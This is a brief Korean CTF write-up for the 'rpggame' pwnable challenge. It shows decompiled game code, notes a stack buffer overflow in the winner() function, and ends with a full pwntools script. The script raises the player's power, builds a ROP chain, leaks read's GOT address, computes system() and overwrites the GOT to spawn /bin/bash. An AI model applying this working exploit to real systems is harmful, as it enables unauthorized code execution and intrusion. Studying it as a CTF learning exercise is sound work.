[Trustealth] rpggame

int __cdecl __noreturn main(int argc, const char **argv, const char **envp)
{
  setvbuf(stdout, 0, 2, 0);
  setvbuf(stdin, 0, 2, 0);
  while ( 1 )
  {
    puts("welcome to the Coder world!\n");
    puts("1.fight");
    puts("2.shop");
    puts("3.trainning");
    puts("4.exit");
    __isoc99_scanf("%d", &cho);
    switch ( cho )
    {
      case 1:
        fight();
        break;
      case 2:
        shop();
        break;
      case 3:
        trainning();
        break;
      default:
        puts("defalt input!");
        break;
    }
  }
}

이 문제는 증말루다가 간단한 문제였다.

int fight()
{
  int result; // eax
 
  puts("hahaha...fight me?!?!?!??!?");
  printf("let's fight!");
  printf("you're power : %d\n", power);
  if ( power <= 800 )
    result = puts("hahahahhahahahahahaha you're very weak!");
  else
    result = winner();
  return result;
}

fighting 함수에서 winner함수로 넘어가는 조건 맞춰주고 rop해주면 된다.

ssize_t winner()
{
  char buf; // [esp+2h] [ebp-36h]
 
  write(1, "you're win!\n", 0xFu);
  printf("what's your name ? : ");
  return read(0, &buf, 0x1F4u);
}

여기서 그냥 bof 터진다.

int trainning()
{
  puts("let's trainning!!");
  puts("ha,,,ha,,,");
  power += 50;
  return puts("g00d,,!!!\n");
}

여기서 power 값 증가시키고 rop해주면 된다.

from pwn import *
import time
 
#p = remote('198.13.62.9', 5467)
p = process('./rpggame')
e = ELF('./rpggame')
rop = ROP(e)
cmd = '/bin/bash\x00'
#offset = 0x99a10
offset = 0x9ad60
 
rop.read(0, e.bss(), len(cmd)+2)
rop.write(1, e.got['read'], 4)
rop.read(0, e.got['read'], 4)
rop.read(e.bss())
 
pay = 'A'*58
pay += rop.chain()
 
for i in range(17):
    p.recv()
    p.sendline('3')
 
p.recv()
p.sendline('1')
p.recv()
p.sendline(pay)
p.sendline(cmd)
read_a = u32(p.recv(4))
log.info('read : ' + str(hex(read_a)))
system = read_a - offset
log.info('system : ' + str(hex(system)))
p.sendline(p32(system))
p.interactive()

끝